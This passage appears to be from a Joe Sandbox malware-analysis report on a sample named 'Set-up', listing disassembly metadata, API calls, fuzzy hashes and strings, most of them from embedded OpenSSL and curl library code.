                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQueryfflush
                                      • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                      • API String ID: 1125614567-122532811
                                      • Opcode ID: 6f0c1a7c778bcc78a03cfafe4fd25449d6df5c85912017e55bd7c6e142a02b87
                                      • Instruction ID: f45037d8120aae95f888f974b08c7cf3d35396d32d25cea39f8bd9378cf9a5fb
                                      • Opcode Fuzzy Hash: 6f0c1a7c778bcc78a03cfafe4fd25449d6df5c85912017e55bd7c6e142a02b87
                                      • Instruction Fuzzy Hash: 7142E671B08711AFD708DE28DC85B6BBAEAFFC4700F04892CF549972D1E775A9148B92
                                      APIs
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 007A0374
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 007A0395
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 007A049D
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 007A04E7
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 007A055F
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 007A057A
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 007A0618
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 007A06E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
                                      • API String ID: 1297977491-3776850024
                                      • Opcode ID: cf752726697d4d615f7e18be7c478bba7384cbb1f8d579cab639f2ee23ab9887
                                      • Instruction ID: 4eace3310266efaccd85fa8140460ab065557f29beaacff7fc177370c5a1fddb
                                      • Opcode Fuzzy Hash: cf752726697d4d615f7e18be7c478bba7384cbb1f8d579cab639f2ee23ab9887
                                      • Instruction Fuzzy Hash: BE5283729087818BD711CF28D845BABB7E5BFDA344F048B2DF9C893252E7749944CB92
                                      APIs
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 006EE28D
                                      • FindNextFileW.KERNEL32(?,00000000), ref: 006EE2BB
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 006EE30A
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 006EE3C7
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006EE3DD
                                      • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 006EE3F8
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 006EE41A
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 006EE44E
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 006EE563
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 006EE571
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
                                      • String ID:
                                      • API String ID: 1393009926-0
                                      • Opcode ID: c90ab09840ded261dd554052b16eff44a5eef1efb2ed9ee6246fb4558c26c224
                                      • Instruction ID: 1f824baa5c8a8b7023ce75553dc20d6b644bfe45c658cfefc8440a2b1730f78e
                                      • Opcode Fuzzy Hash: c90ab09840ded261dd554052b16eff44a5eef1efb2ed9ee6246fb4558c26c224
                                      • Instruction Fuzzy Hash: 2B912735201B829FD7219F39CC45BA6BBA6FF85314F184668E556CB3E1E732E940CB50
                                      APIs
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 005CCC95
                                        • Part of subcall function 005CCDF0: memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 005CCEC8
                                        • Part of subcall function 005CCDF0: SetLastError.KERNEL32(00000002,00000000,005CCC27,00000004), ref: 005CD109
                                      • SetLastError.KERNEL32(00000002), ref: 005CCDD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ErrorLastmemchr
                                      • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                      • API String ID: 2208448350-3285806060
                                      • Opcode ID: 335d57f9e7f5f64d55422c6b0084366b1164e12246254b049743b796cf105d52
                                      • Instruction ID: badf5954ff4c4dc455c426be9b1d055ae4e249fe9c7b378bb577c1050c2f3904
                                      • Opcode Fuzzy Hash: 335d57f9e7f5f64d55422c6b0084366b1164e12246254b049743b796cf105d52
                                      • Instruction Fuzzy Hash: 13D1B472A083428FD724DEA8C841B6ABFD1BF91304F18492DF99E97281DA749D84D782
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %-18s$%5ld:d=%-2d hl=%ld l=%4ld %s$%5ld:d=%-2d hl=%ld l=inf %s$(unknown)$<ASN1 %d>$BAD RECURSION DEPTH$Error in encoding$appl [ %d ]$cons: $cont [ %d ]$length is greater than %ld$prim: $priv [ %d ]
                                      • API String ID: 0-2568808753
                                      • Opcode ID: c91085460a59d8bb2883125801c099a285503fc3cebbab7661d9a2945ddb1bc8
                                      • Instruction ID: 1077176b14a7c9f7d4b5b794bd3b65afdbef068fe5110a85f137b2aacc1a2a62
                                      • Opcode Fuzzy Hash: c91085460a59d8bb2883125801c099a285503fc3cebbab7661d9a2945ddb1bc8
                                      • Instruction Fuzzy Hash: C3E10671508302AFD720BF54DC41B6FB7E6AF84745F044A2CFA8A53292FB71E9048B96
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                      • API String ID: 0-2555271450
                                      • Opcode ID: f0ed294f316a245dad984f290798aa084e602eea7e2efa2ae9440c58e98590ac
                                      • Instruction ID: 1c63e0dd967b714b2f295513ab7a9f206203420612ca923c1ce6dd7fdbc8dd83
                                      • Opcode Fuzzy Hash: f0ed294f316a245dad984f290798aa084e602eea7e2efa2ae9440c58e98590ac
                                      • Instruction Fuzzy Hash: 88C28E716083419FE715CF28C4907AABBE2FFC9354F158A2DE8999B351D730ED858B82
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 008806A3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: $
                                      • API String ID: 3510742995-227171996
                                      • Opcode ID: 8dd6bb979b9886c9fe6c5662be52be3ff30a9da3cd25c3a7b5687550be188a12
                                      • Instruction ID: a8541f7880b5156a534224f0e150e7a5f03c2c17827d1b2b2780ed6bf3b16c22
                                      • Opcode Fuzzy Hash: 8dd6bb979b9886c9fe6c5662be52be3ff30a9da3cd25c3a7b5687550be188a12
                                      • Instruction Fuzzy Hash: 64D28C72A087558FC724DF28C88426AF7E2FFC8314F198A2DE99997351D770A945CF82
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00758A66
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00758A88
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00758B45
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00758B59
                                      Strings
                                      • providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00758A42, 00758F13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
                                      • API String ID: 1297977491-3184136495
                                      • Opcode ID: 4ba1ad2f1f472d2a2ae6741aad7afdca68798418cfeb1618453a131157f0ac39
                                      • Instruction ID: 9d18c57e9ef8208200b7954559a7f22d05d5ff9540dcf5b1e8ba202a2a3be097
                                      • Opcode Fuzzy Hash: 4ba1ad2f1f472d2a2ae6741aad7afdca68798418cfeb1618453a131157f0ac39
                                      • Instruction Fuzzy Hash: 0D2203725087419FD711CF24C881BABB7E5FF96304F084A1DF89597282EB75E948CBA2
                                      APIs
                                      • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 008947A3
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008947C1
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00894800
                                      • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00894D16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _strdupmemcpystrchrstrlen
                                      • String ID: H$xn--
                                      • API String ID: 1602650251-4022323365
                                      • Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                                      • Instruction ID: f440c346db207c692ed60cad87cc8847971b4ef9dbbe95c6cbfeddfa1049486f
                                      • Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                                      • Instruction Fuzzy Hash: A7E1F6716087198BDB18EE28D8C0A2AB7D2FBC4314F1D9A3DE996C7391E774DC468742
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0081C090
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 0081C0BE
                                      Strings
                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 0081C0CD, 0081C26B
                                      • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 0081C0D2, 0081C266
                                      • assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 0081C433
                                      • crypto/evp/encode.c, xrefs: 0081C42E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
                                      • API String ID: 3510742995-2458911571
                                      • Opcode ID: 4193f17c7bda7a0a1d921feecd406ec5b7dba5fba33ce3ee11bb6c0b6e8d4457
                                      • Instruction ID: 75048ebd7a6133a4563337e5df95f7e74cd4bb150f47b4a9582c6ec432e02f38
                                      • Opcode Fuzzy Hash: 4193f17c7bda7a0a1d921feecd406ec5b7dba5fba33ce3ee11bb6c0b6e8d4457
                                      • Instruction Fuzzy Hash: 17C1F47160C3958FC7159F28C49076ABBE5FF9A304F0989ADE8D5CB382D234E941CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$@$@$ssl/quic/quic_txp.c
                                      • API String ID: 0-600063881
                                      • Opcode ID: f0377ac9aa204b14b55ccb647d6914c657e01e42fe4b151e6605b1dfb2e6dec6
                                      • Instruction ID: 541caac14a91e53b3360cb05ee1cd04b7a972c7ade75220df6baaf49d9792b44
                                      • Opcode Fuzzy Hash: f0377ac9aa204b14b55ccb647d6914c657e01e42fe4b151e6605b1dfb2e6dec6
                                      • Instruction Fuzzy Hash: 9B53E4716083419FD724CF28C895BABB7E2BF84314F14896DE89D87391EB71E945CB82
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
